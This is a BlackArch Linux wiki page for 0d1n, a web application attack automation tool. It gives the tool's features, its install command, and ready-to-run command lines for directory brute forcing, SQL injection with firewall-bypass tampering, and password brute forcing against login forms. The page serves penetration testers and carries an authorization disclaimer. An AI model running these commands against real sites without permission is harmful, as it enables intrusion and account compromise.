BlackArch Wiki

BlackArch Wiki

Contents:
  1. Description
  2. Groups
  3. Tool functions
  4. Installation
  5. Attack examples
    1. Brute force to find the directory:
    2. For SQL injection attack:
    3. To brute force auth system:
    4. Search SQLi in hard mode in login system with csrf token:
  6. Additional Resources
    1. External Libs
  7. Disclaimer

0d1n

Description

0d1n is a powerful tool designed to automate customized attacks against web applications. Its advanced thread pool and C language implementation allows for significantly faster execution of attacks.

Groups

  • blackarch
  • blackarch-webapp
  • blackarch-fuzzer
  • blackarch-scanner

Tool functions

  • Brute force login and passwords in auth forms
  • Directory disclosure ( use PATH list to the brute, and find HTTP status code )
  • Test to find SQL Injection and XSS vulnerabilities
  • Test to find SSRF
  • Test to find Command injection
  • Options to load ANTI-CSRF token each request
  • Options to use random proxy per request
  • Options to use random useragent per request
  • Option for keep alive test (slowloris test)
  • other functions.

Installation

Instructions on how to install the tool or package on BlackArch Linux.

pacman -S 0d1n

Attack examples

Brute force to find the directory:

0d1n --host http://127.0.0.1/^ --payloads /opt/0d1n/payloads/dir_brute.txt --threads 500 --timeout 3 --log bartsimpsom4 --save_response

Note: You can change the value of threads. If you have a good machine, you can try 800, 1200 each device has a different context.

For SQL injection attack:

0d1n --host 'http://site.com/view/1^/product/^/' --payloads /opt/0d1n/payloads/sqli_list.txt --find_string_list /opt/0d1n/payloads/sqli_str2find_list.txt --log log1337 --tamper randcase --threads 800 --timeout 3 --save_response\n"

Note: Tamper is a resource to try to bypass the web application firewall

To brute force auth system:

0d1n --host 'http://site.com/auth.py' --post 'user=admin&password=^' --payloads /opt/0d1n/payloads/wordlist.txt --log log007 --threads 500 --timeout 3\n"

Note: if you have a csrf token, you can use argv to get this token for each request and brute.

Search SQLi in hard mode in login system with csrf token:

0d1n  --host "http://127.0.0.1/vulnerabilities/sqli/index.php?id=^" --payloads /opt/0d1n/payloads/sqli.txt --find_string_list /opt/0d1n/payloads/find_responses.txt --token_name user_token --log logtest_fibonaci49 --cookie_jar /home/user_name/cookies.txt --save_response --tamper randcase --threads 100

Note: Load the cookies jar from the browser and save in cookies.txt to load.

Additional Resources

External Libs

  • To gain extreme performance, 0d1n uses a thread pool of POSIX threads. You can study this small library.
  • 0d1n uses OpenBSD/NetBSD functions to work with strings something like strlcat() and strlcpy() to prevent buffer overflow. More info here.
  • Developer demonstration video.

Disclaimer

It is important to note that the use of this tool for any illegal or unauthorized activities is strictly prohibited. The creators of this tool and BlackArch Linux will not be held liable for any actions taken with its use. This tool is intended for use by security professionals and researchers for lawful and ethical testing purposes only. Remember, always obtain proper authorization and comply with all relevant laws and regulations when using this tool or any other security tool.